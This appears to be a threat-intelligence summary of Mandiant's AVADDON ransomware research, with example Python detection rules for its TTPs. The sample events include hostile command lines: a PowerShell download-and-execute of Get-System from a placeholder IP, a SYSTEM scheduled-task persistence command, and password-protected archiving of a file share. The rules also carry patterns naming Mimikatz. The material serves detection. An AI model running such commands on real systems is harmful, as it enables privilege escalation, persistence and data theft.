January 25, 2022

Mandiant – AVADDON Ransomware

Industry: N/A | Level: Operational | Source: Mandiant

Mandiant has published research on AVADDON ransomware, which operated between June 2020 and June 2021, when the group shut down and released its private encryption keys. The ransomware-as-a-service (RaaS) offering was initially advertised on Russian-speaking forums and targeted a broad range of industry verticals. Nearly all sectors were affected, with education, finance, government, healthcare, and technology showing the highest victim counts. Based on the RaaS TTPs observed, Mandiant has suggested a possible link between AVADDON, BLACKMATTER and SABBATH. Observed TTPs included buying compromised credentials from initial access brokers, the custom web shells BLACKCROW and DARKRAVEN, RDP for lateral movement, EMPIRE and POWERSPLOIT for post-exploitation, scheduled tasks for persistence, 7-Zip for archiving data, and MEGAsync for staging and exfiltrating it.

  • Anvilogic Scenario: Avaddon Ransomware – Behaviors
  • Anvilogic Use Cases:
    • Potential Web Shell
    • Mimikatz
    • RDP Hijacking
    • Create/Modify Schtasks
    • PowerSploit Get-system.ps1
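As an added illustration of how the TTPs above translate into detection content, the following Python is example code written for this page; it is not Mandiant's research artifact or Anvilogic's own scenario logic. It runs a handful of process-creation rules (scheduled task creation, 7-Zip archival, MEGAsync launch, RDP client use, PowerSploit Get-System) over a constructed set of Sysmon/4688-style events and then correlates per host, flagging only hosts where two or more distinct behaviours fired. The event field names, host names, usernames, the 203.0.113.5 address and the rule names are all assumptions made for the example.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events (Sysmon Event ID 1 / Security 4688 style).
# These are not real telemetry; hosts, users and paths are invented for the example.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\jdoe", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc onlogon /tn "WinUpdate" /tr "C:\ProgramData\upd.exe" /ru SYSTEM'},
    {"host": "WS01", "user": "CORP\\jdoe", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmdline": r"7z.exe a -pS3cret -mhe=on C:\ProgramData\fin.7z \\FS01\finance\*"},
    {"host": "WS01", "user": "CORP\\jdoe", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\jdoe\AppData\Local\MEGAsync\MEGAsync.exe",
     "cmdline": r'"C:\Users\jdoe\AppData\Local\MEGAsync\MEGAsync.exe"'},
    {"host": "WS02", "user": "CORP\\admin", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mstsc.exe",
     "cmdline": r"mstsc.exe /v:FS01 /admin"},
    {"host": "WS03", "user": "CORP\\backup", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks /query /tn BackupJob"},   # benign: query, not create
    {"host": "WS02", "user": "CORP\\admin", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://203.0.113.5/Get-System.ps1');Get-System"},
]

# One predicate per behaviour. Rule names are assumptions, chosen to mirror the use-case list.
RULES = {
    # Create/Modify Schtasks: only /create and /change, so /query and /delete stay quiet.
    "schtasks_create_modify": lambda e: e["image"].lower().endswith(r"\schtasks.exe")
        and re.search(r"/(create|change)\b", e["cmdline"], re.I) is not None,
    # 7-Zip used with the 'a' (add) verb: archival/staging of data prior to exfiltration.
    "7zip_archive_staging": lambda e: re.search(r"\\7za?\.exe$", e["image"], re.I) is not None
        and re.search(r"\b7za?(\.exe)?\s+a\s", e["cmdline"], re.I) is not None,
    # MEGAsync client execution; the cloud sync tool the text names for exfiltration.
    "megasync_exfil_tool": lambda e: e["image"].lower().endswith(r"\megasync.exe"),
    # RDP client pointed at another host: lateral-movement candidate.
    "rdp_lateral_movement": lambda e: e["image"].lower().endswith(r"\mstsc.exe")
        and re.search(r"/v:\S+", e["cmdline"], re.I) is not None,
    # PowerSploit Get-System or Mimikatz invoked from a PowerShell command line.
    "powersploit_get_system": lambda e: "powershell" in e["image"].lower()
        and re.search(r"Get-System|Invoke-Mimikatz", e["cmdline"], re.I) is not None,
}


def match_rules(event):
    """Return the names of every rule that fires on a single event."""
    return [name for name, pred in RULES.items() if pred(event)]


def detect(events):
    """Run all rules over all events; returns a list of (rule, host, cmdline) hits."""
    hits = []
    for e in events:
        for name in match_rules(e):
            hits.append((name, e["host"], e["cmdline"]))
    return hits


def correlate_by_host(hits, min_distinct=2):
    """Scenario-style correlation: keep only hosts where at least `min_distinct`
    different behaviours fired. A lone schtasks /create is noise; schtasks plus
    7-Zip plus MEGAsync on one host is the chain the Mandiant write-up describes."""
    per_host = defaultdict(set)
    for rule, host, _ in hits:
        per_host[host].add(rule)
    return {h: sorted(r) for h, r in per_host.items() if len(r) >= min_distinct}


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for rule, host, cmd in hits:
        print(f"[{rule}] {host}: {cmd}")
    print("Correlated hosts:", correlate_by_host(hits))
```

With the constructed events, WS01 trips the scheduled-task, 7-Zip and MEGAsync rules and WS02 trips the RDP and Get-System rules, while WS03 (a benign `schtasks /query`) produces nothing. In a real deployment the rules would be the individual use cases and the per-host threshold the scenario that ties them together; tuning the 7-Zip rule to require a `-p` password switch or a network-share source path cuts false positives from routine archiving.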